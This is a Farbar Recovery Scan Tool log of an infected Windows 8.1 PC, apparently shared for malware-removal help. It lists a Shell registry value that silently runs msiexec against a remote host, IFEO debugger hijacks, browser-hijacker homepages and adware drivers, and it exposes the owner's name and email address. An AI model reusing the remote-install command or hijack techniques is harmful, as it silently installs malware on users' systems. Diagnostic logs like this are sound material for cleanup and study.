Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
Ran by Oli (administrator) on OLIWIA (22-05-2017 17:22:10)
Running from C:\Users\Oli\Downloads
Loaded Profiles: Oli (Available Profiles: Oli)
Platform: Windows 8.1 (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1")
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(ESET) C:\Program Files\ESET\ESET Security\ekrn.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(ESET) C:\Program Files\ESET\ESET Security\egui.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(ALLPlayer Group Ltd.) C:\Program Files (x86)\ALLPlayer Remote\ALLPlayerRemoteControl.exe
(Spotify Ltd) C:\Users\Oli\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM-x32\...\Run: [IseUI] => C:\Program Files (x86)\COMODO\Internet Security Essentials\vkise.exe
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-10-29] (Microsoft Corporation)
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [Spotify Web Helper] => C:\Users\Oli\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1449584 2017-05-22] (Spotify Ltd)
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [Spotify] => C:\Users\Oli\AppData\Roaming\Spotify\Spotify.exe [6997104 2017-05-22] (Spotify Ltd)
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [ALLUpdate] => C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe [3670472 2015-07-28] (ALLPlayer Group Ltd.)
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [Napisy24Update] => "C:\Program Files (x86)\Napisy24\Napisy24Update.exe" "sleep"
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Run: [ALLPlayer WiFi Remote] => C:\Program Files (x86)\ALLPlayer Remote\ALLPlayerRemoteControl.exe [6168768 2016-09-15] (ALLPlayer Group Ltd.)
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== /q
AppInit_DLLs: C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [181280 2017-01-25] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [158392 2017-01-25] (NVIDIA Corporation)
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{83E9D82E-80F2-4AE1-8F6E-B5907E69F380}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: m03wbirn.default
FF ProfilePath: C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default [2017-05-11]
FF user.js: detected! => C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\user.js [2017-05-11]
FF Homepage: Mozilla\Firefox\Profiles\m03wbirn.default -> hxxp://www.luckysearch123.com?type=hp&ts=1494523248&from=c8350511&uid=toshibaxmq01abd050_23o5flvbsxx23o5flvbs&z=31bbad4a0d8b03ce67d2bbegaz6tez6wao1c0ocz6q
FF NewTab: Mozilla\Firefox\Profiles\m03wbirn.default -> hxxp://www.luckysearch123.com?type=hp&ts=1494523248&from=c8350511&uid=toshibaxmq01abd050_23o5flvbsxx23o5flvbs&z=31bbad4a0d8b03ce67d2bbegaz6tez6wao1c0ocz6q
FF Extension: (Browser-Security) - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\Extensions\firefox@browser-security.de.xpi [2017-02-22]
FF Extension: (Adblock Plus) - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-19]
FF Extension: (No Name) - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\extensions\arthurj8283@gmail.com [not found]
FF SearchPlugin: C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\searchplugins\luck.xml [2017-05-11]
FF ProfilePath: C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default [2017-05-12]
FF user.js: detected! => C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\user.js [2017-02-22]
FF Homepage: Firefox\Firefox\Profiles\m03wbirn.default -> www.google.pl
FF Extension: (SimilarWeb) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-11] [not signed]
FF Extension: (HSearch) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-11] [not signed]
FF Extension: (FF Adr) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-11] [not signed]
FF Extension: (Browser-Security) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\firefox@browser-security.de.xpi [2017-02-22]
FF Extension: (Adblock Plus) - C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-19]
FF SearchPlugin: C:\Users\Oli\AppData\Roaming\Firefox\Firefox\Profiles\m03wbirn.default\searchplugins\startsearch.xml [2017-05-11]
FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Oli\AppData\Roaming\Mozilla\Firefox\Profiles\m03wbirn.default\extensions\arthurj8283@gmail.com => not found

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ekrn; C:\Program Files\ESET\ESET Security\ekrn.exe [2624856 2017-03-09] (ESET)
S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [132848 2017-03-09] (ESET)
S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [14880 2017-03-09] (ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [178056 2017-03-09] (ESET)
R1 epfwwfpr; C:\WINDOWS\system32\DRIVERS\epfwwfpr.sys [77224 2017-03-09] (ESET)
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R0 sptd; C:\WINDOWS\System32\Drivers\sptd.sys [394296 2017-05-12] (Duplex Secure Ltd.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-05-22 17:22 - 2017-05-22 17:22 - 00009865 _____ C:\Users\Oli\Downloads\FRST.txt
2017-05-22 17:21 - 2017-05-22 17:21 - 02429952 _____ (Farbar) C:\Users\Oli\Downloads\FRST64.exe
2017-05-12 18:42 - 2017-05-12 18:42 - 00394296 _____ (Duplex Secure Ltd.) C:\WINDOWS\system32\Drivers\sptd.sys
2017-05-12 18:41 - 2017-05-12 18:41 - 00593952 _____ (Duplex Secure Ltd) C:\Users\Oli\Downloads\Unconfirmed 885591.crdownload
2017-05-12 18:41 - 2017-05-12 18:41 - 00593952 _____ (Duplex Secure Ltd) C:\Users\Oli\Downloads\SPTDinst-v189-x64 (1).exe
2017-05-12 18:31 - 2017-05-22 17:22 - 00000000 ____D C:\FRST
2017-05-11 23:15 - 2017-05-12 17:54 - 00000000 ____D C:\Users\Oli\AppData\LocalLow\Mozilla
2017-05-11 23:14 - 2017-05-11 23:14 - 00000000 ____D C:\Users\Oli\AppData\Local\VirtualStore
2017-05-11 22:49 - 2017-05-11 22:49 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-11 21:58 - 2017-05-11 21:58 - 00000000 ____D C:\Users\Oli\AppData\Local\ESET
2017-05-11 21:54 - 2017-05-11 21:54 - 00000000 ____D C:\Program Files\ESET
2017-05-11 21:38 - 2017-05-11 21:38 - 03139200 _____ (ESET) C:\Users\Oli\Downloads\eset_nod32_antivirus_live_installer.exe
2017-05-11 21:32 - 2017-05-12 18:03 - 00000000 ____D C:\Users\Oli\AppData\Local\Google
2017-05-11 21:32 - 2017-05-11 21:32 - 00000000 ____D C:\Users\Oli\AppData\Local\Bagsarah
2017-05-11 19:25 - 2017-05-11 19:25 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-05-11 19:18 - 2017-05-11 19:18 - 00002106 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-05-11 19:18 - 2017-05-11 19:18 - 00000000 ____D C:\Users\Oli\AppData\Local\Firefox
2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Firefox
2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
2017-05-11 19:16 - 2017-05-11 19:17 - 00002055 _____ C:\Users\Oli\Desktop\big_bang_empire.lnk
2017-05-11 19:16 - 2017-05-11 19:16 - 00002029 _____ C:\Users\Oli\Desktop\BigFarm.lnk
2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 ____D C:\WINDOWS\system32\log
2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Elex-tech
2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-11 19:16 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
2017-05-11 19:15 - 2017-05-12 18:47 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-05-11 19:15 - 2017-05-11 22:04 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-11 19:15 - 2017-05-11 21:20 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 ____D C:\Program Files (x86)\Bagsarah
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\00
2017-05-10 18:19 - 2017-03-30 15:15 - 00875712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll
2017-05-10 18:19 - 2017-03-30 15:15 - 00869568 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll
2017-05-10 18:19 - 2017-03-30 15:15 - 00678592 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll
2017-05-10 18:19 - 2017-03-30 15:15 - 00536768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll
2017-05-10 17:33 - 2017-04-28 23:15 - 07444824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-10 17:33 - 2017-04-26 16:06 - 04169216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2017-05-10 17:33 - 2017-04-16 12:23 - 02176584 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-10 17:33 - 2017-04-16 12:23 - 01662096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-10 17:33 - 2017-04-16 12:23 - 01063464 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2017-05-10 17:33 - 2017-04-16 12:18 - 01135288 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-10 17:33 - 2017-04-16 12:18 - 00803192 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-10 17:33 - 2017-04-16 11:07 - 01566032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-10 17:33 - 2017-04-16 11:07 - 01213792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-10 17:33 - 2017-04-16 11:07 - 00548032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-05-10 17:33 - 2017-04-16 11:05 - 00612096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-10 17:33 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-10 17:33 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-10 17:33 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-10 17:33 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollector.exe
2017-05-10 17:33 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-05-10 17:33 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-10 17:33 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-10 17:33 - 2017-04-16 10:16 - 00862720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-10 17:33 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-10 17:33 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-10 17:33 - 2017-04-16 10:02 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-10 17:33 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-10 17:33 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-10 17:33 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-05-10 17:33 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-10 17:33 - 2017-04-16 09:52 - 01033216 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2017-05-10 17:33 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-10 17:33 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-05-10 17:33 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-10 17:33 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-10 17:33 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-10 17:33 - 2017-04-16 09:40 - 00378880 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-10 17:33 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-10 17:33 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-10 17:33 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-10 17:33 - 2017-04-16 09:23 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-10 17:33 - 2017-04-16 09:22 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-10 17:33 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-10 17:33 - 2017-04-16 09:17 - 00880640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2017-05-10 17:33 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-10 17:33 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-10 17:33 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-10 17:33 - 2017-04-16 09:10 - 00330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-10 17:33 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-10 17:33 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-10 17:33 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-10 17:33 - 2017-04-16 09:02 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2017-05-10 17:33 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-10 17:33 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-10 17:33 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-10 17:33 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-10 17:33 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-10 17:33 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-10 17:33 - 2017-04-10 00:00 - 01548640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-10 17:33 - 2017-04-10 00:00 - 00388448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-10 17:33 - 2017-04-08 01:20 - 01375960 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2017-05-10 17:33 - 2017-04-07 15:56 - 01094656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-05-10 17:33 - 2017-04-02 18:41 - 00684544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-10 17:33 - 2017-04-02 18:41 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-10 17:33 - 2017-04-01 01:16 - 01968408 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-10 17:33 - 2017-03-31 23:59 - 01612504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-10 17:33 - 2017-03-13 18:38 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmitomi.dll
2017-05-10 17:33 - 2017-03-13 18:29 - 02609664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2017-05-10 17:33 - 2017-03-13 18:25 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll
2017-05-10 17:33 - 2017-03-13 18:13 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmitomi.dll
2017-05-10 17:33 - 2017-03-13 18:07 - 02170880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2017-05-10 17:33 - 2017-03-13 18:06 - 00236032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2017-05-10 17:33 - 2017-03-11 21:34 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-05-10 17:33 - 2017-03-11 21:32 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2017-05-10 17:33 - 2017-03-11 21:32 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-05-10 17:33 - 2017-03-11 20:49 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-05-10 17:33 - 2017-03-11 19:58 - 01437696 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-05-10 17:33 - 2017-03-11 19:54 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-05-10 17:33 - 2017-03-11 01:38 - 02017624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-05-10 17:33 - 2017-03-11 01:38 - 00275800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-05-10 17:33 - 2017-03-09 22:52 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wisp.dll
2017-05-10 17:33 - 2017-03-09 21:17 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wisp.dll
2017-05-10 17:33 - 2017-03-08 04:44 - 00448285 _____ C:\WINDOWS\system32\ApnDatabase.xml
2017-05-07 20:49 - 2017-05-07 20:49 - 00013016 _____ C:\Users\Oli\Downloads\Intouchables 2011.srt
2017-05-07 11:00 - 2017-05-07 11:00 - 01861011 _____ C:\Users\Oli\Desktop\Wyniki wyszukiwania - olivia.ostrowska@gmail.com - Gmail.htm
2017-05-07 11:00 - 2017-05-07 11:00 - 00000000 ____D C:\Users\Oli\Desktop\Wyniki wyszukiwania - olivia.ostrowska@gmail.com - Gmail_pliki
2017-05-03 14:30 - 2017-05-05 07:33 - 00000000 ____D C:\Users\Oli\Desktop\j.polski
2017-04-22 17:27 - 2017-04-22 17:27 - 00186115 _____ C:\Users\Oli\Downloads\Praca-nr-1-A.-Dobrzyniecka-21.04.2017-PDF.pdf
2017-04-22 13:43 - 2017-04-22 13:43 - 00025890 _____ C:\Users\Oli\Desktop\Zeszyt1.xlsx

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-05-22 17:11 - 2017-02-23 16:14 - 00000000 ____D C:\Users\Oli\AppData\Local\Spotify
2017-05-22 17:11 - 2017-02-23 16:13 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Spotify
2017-05-18 17:13 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-12 19:42 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf
2017-05-11 23:15 - 2017-02-19 03:34 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Mozilla
2017-05-11 22:49 - 2017-02-19 04:55 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-11 22:47 - 2017-02-19 04:55 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-11 22:40 - 2017-02-19 03:28 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2083115291-1334581206-888238541-1001
2017-05-11 22:06 - 2017-02-22 19:27 - 00000000 ____D C:\Users\Oli\AppData\Roaming\Browser-Security
2017-05-11 22:04 - 2017-04-01 12:35 - 00000000 ____D C:\KMPlayer
2017-05-11 22:04 - 2017-03-04 14:08 - 00000000 ____D C:\Users\Oli\Desktop\Zdjęcia
2017-05-11 22:04 - 2017-02-20 22:10 - 00000000 ____D C:\Users\Oli\Desktop\Syria
2017-05-11 22:04 - 2017-02-19 04:31 - 00000000 ___HD C:\$SysReset
2017-05-11 22:04 - 2017-02-19 03:34 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-11 22:04 - 2017-02-19 03:13 - 00000000 ____D C:\WINDOWS\Panther
2017-05-11 22:04 - 2016-02-27 23:59 - 00000000 ____D C:\Users\Oli\Desktop\Syria- 3 rozdział
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\SysWOW64\Com
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\security
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Registration
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Help
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\FileManager
2017-05-11 22:04 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-11 22:04 - 2013-08-22 16:44 - 00511880 _____ C:\WINDOWS\system32\FNTCACHE.DAT
